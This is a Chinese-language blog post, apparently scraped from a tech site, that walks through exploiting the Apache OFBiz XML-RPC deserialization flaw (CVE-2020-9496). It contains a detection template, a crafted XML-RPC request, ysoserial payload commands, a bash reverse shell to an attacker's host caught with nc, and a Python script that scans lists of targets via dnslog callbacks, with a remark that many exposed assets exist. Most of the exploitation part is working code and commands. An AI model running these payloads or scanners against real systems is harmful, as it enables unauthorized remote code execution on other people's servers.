Apache Ofbiz XML-RPC反序列化漏洞(CVE-2020-9496)

简介: Apache Ofbiz XML-RPC反序列化漏洞(CVE-2020-9496)

Apache Ofbiz介绍

OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。

漏洞概述

Apache ofbiz 存在反序列化漏洞,攻击者 通过 访问未授权接口,构造特定的xmlrpc http请求,可以造成远程代码执行的影响。

漏洞影响版本

ApacheOfbiz:<17.12.04

环境搭建

本次环境使用vulhub搭建


dockerpull andyjunghans/ofbizdocker run -p 8080:8080 -p8443:8443 andyjunghans/ofbiz


访问ip:8080/webtools/control/xmlrpc即可看到入口点

640.png

漏洞复现

Poc

    id: CVE-2020-9496
    info:  name: Apache OFBiz XML-RPC Java Deserialization  author: dwisiswant0  severity: medium
      # This temaplte detects a Java deserialization vulnerability in Apache  # OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for  # versions prior to 17.12.04.  # --  # References:  # - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz
    requests:  - raw:      - |        POST /webtools/control/xmlrpc HTTP/1.1        Host: {{Hostname}}        Content-Type: application/xml
            <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>    matchers-condition: and    matchers:      - type: word        words:          - "faultString"          - "No such service [ProjectDiscovery]"          - "methodResponse"        condition: and        part: body      - type: word        words:          - "Content-Type: text/xml"        part: header      - type: status        status:          - 200

    根据这个yaml,可以了解到,当post一个xml的poc过去后,如果返回包里同时存在

    faultString,No such service [ProjectDiscovery],methodResponse证明有漏洞存在。


    代码执行

    Burp抓包,把数据包替换成以下数据包

      POST /webtools/control/xmlrpc HTTP/1.1Host: 192.168.240.141:8443Content-Type: application/xmlContent-Length: 4125
      <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">payload</serializable></value></member></struct></value></param></params></methodCall>


      使用使用ysoserial的CommonsBeanutils1来生成Payload在tmp目录写入文件(无回显)


      java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/success" | base64 |  tr -d '\n'


      640.png


      复制base64编码得payload,粘贴到burp数据包中base64payload的地方,点击发送,可以进docker中查看是否写入成功

      640.png

      进入容器查看成功写入


      docker exec -it 容器id /bin/bash

      640.png


      反弹shell

      去以下网址把反弹shellpayload进行base64编码

      http://www.jackson-t.ca/runtime-exec-payloads.html

      bash反弹命令:bash-i >& /dev/tcp/ip/port 0>&1

      640.png

      把编码后的shell在使用ysoserial工具进行一次base64编码


      java -jar ysoserial.jar  CommonsBeanutils1 "base64-payload" | base64 |  tr -d '\n'

      640.png

      nc设置监听,把生成的exp放入到burp的数据包中发送,查看nc监听以返回shell

      640.png

      640.png

      通过搜索引擎发现资产还是很多的

      640.png

      检测脚本

      无回显通过dnslog进行检测验证

        import sysimport argparseimport subprocessimport requestsfrom time import sleepimport base64from requests.packages.urllib3.exceptions import InsecureRequestWarning
        def title():    print('+-------------------+')    print('| author:lemonlove7 |')    print('| use:python poc.py |')    print('+-------------------+')
        def dnslog():    global dns_session    dns_session = requests.session()    dns = dns_session.get('http://www.dnslog.cn/getdomain.php')    return dns.text
        def dnslog_res():    dns_res = dns_session.get('http://www.dnslog.cn/getrecords.php')    if dns_res.json():        return True    else:        return False
        def CVE_2020_9496(target_url):    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)    headers = {'Content-Type': 'application/xml'}    # popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', "CommonsBeanutils1", 'ping '+dnslog()], stdout=subprocess.PIPE)    popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', "URLDNS", 'http://'+dnslog()], stdout=subprocess.PIPE)    data = base64.b64encode(popen.stdout.read())    post_data = f'''<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">{str(data, 'utf-8')}</serializable></value></member></struct></value></param></params></methodCall>'''    if target_url.startswith('https://'):        vuln_url = target_url + "/webtools/control/xmlrpc"    else:        vuln_url = 'https://' + target_url + "/webtools/control/xmlrpc"    try:        r = requests.post(vuln_url, data=post_data, headers=headers, verify=False, timeout=5)        if r.status_code == 200:            sleep(2)            if dnslog_res():                print(f'[+] {target_url}  dnslog验证成功,漏洞存在')                return True            else:                print(f'[x] {target_url}  利用失败')    except Exception:        print(f"[x] {target_url}  poc请求失败 ")
        if __name__ == '__main__':    if len(sys.argv) == 1:        title()        sys.exit()    parser = argparse.ArgumentParser(description='''CVE-2020-9496 help''')    parser.add_argument('-u', '--url', help='请输入url', default='')    parser.add_argument('-f', '--file', help='请输入file', default='')    args = parser.parse_args()    url = args.url    file = args.file    if url != '':        target_url=url        if target_url:            CVE_2020_9496(target_url)    if file !='':        f = open(file,'r')        for i in f.readlines():            url=i.strip()            if url:                CVE_2020_9496(url)

        640.png

        相关文章
        |
        11天前
        |
        XML 安全 Java
        从零手写实现 apache Tomcat-02-web.xml 入门详细介绍
        `web.xml`是Java Web应用的核心配置文件,描述应用工作方式。它包含Servlet、Filter和Listener的定义。例如,示例展示了如何配置名为`my`的Servlet处理`/my`请求,`LoggingFilter`拦截所有请求,以及`MyServletContextAttrListener`监听应用事件。`web.xml`是服务器理解应用结构与行为的指南。迷你版Tomcat实现——mini-cat(开源:https://github.com/houbb/minicat)。
        |
        2月前
        |
        XML Java Apache
        Apache Flink自定义 logback xml配置
        Apache Flink自定义 logback xml配置
        169 0
        |
        8月前
        |
        安全 应用服务中间件 Apache
        Apache-Tomcat-Ajp文件读取漏洞(CVE-2020-1938、CNVD-2020-10487)
        Apache-Tomcat-Ajp文件读取漏洞产生原因是由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件
        301 1
        |
        5月前
        |
        SQL Java 数据库连接
        Java【付诸实践 01】使用org.apache.ibatis.plugin.Interceptor拦截器实现全局mapper.xml参数注入(可用于切换数据库实例schema)源码实例分享
        Java【付诸实践 01】使用org.apache.ibatis.plugin.Interceptor拦截器实现全局mapper.xml参数注入(可用于切换数据库实例schema)源码实例分享
        41 0
        |
        7月前
        |
        存储 安全 Java
        【Shiro】Apache Shiro 默认密钥致命令执行漏洞(CVE-2016-4437)的解决方案
        【Shiro】Apache Shiro 默认密钥致命令执行漏洞(CVE-2016-4437)的解决方案
        154 0
        |
        8月前
        |
        安全 Java Shell
        Apache Log4j2 远程代码执行漏洞
        Apache Log4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。
        62 2
        |
        8月前
        |
        SQL 安全 数据可视化
        Apache Superset 未授权访问漏洞(CVE-2023-27524)
        Apache Superset 存在未授权访问漏洞,攻击者可利用该漏洞验证和访问未经授权的资源。
        144 1
        |
        9月前
        |
        安全 druid Java
        【紧急】Apache Log4j任意代码执行漏洞安全风险升级修复教程
        近期一个 Apache Log4j 远程代码执行漏洞细节被公开,攻击者利用漏洞可以远程执行代码。经过分析,该组件存在Java JNDI注入漏洞,当程序将用户输入的数据进行日志,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。
        220 1
        |
        11月前
        |
        消息中间件 存储 安全
        |
        12月前
        |
        XML Dubbo Java
        带你读《Apache Dubbo微服务开发从入门到精通》——四、 XML配置
        带你读《Apache Dubbo微服务开发从入门到精通》——四、 XML配置
        73 1

        推荐镜像

        更多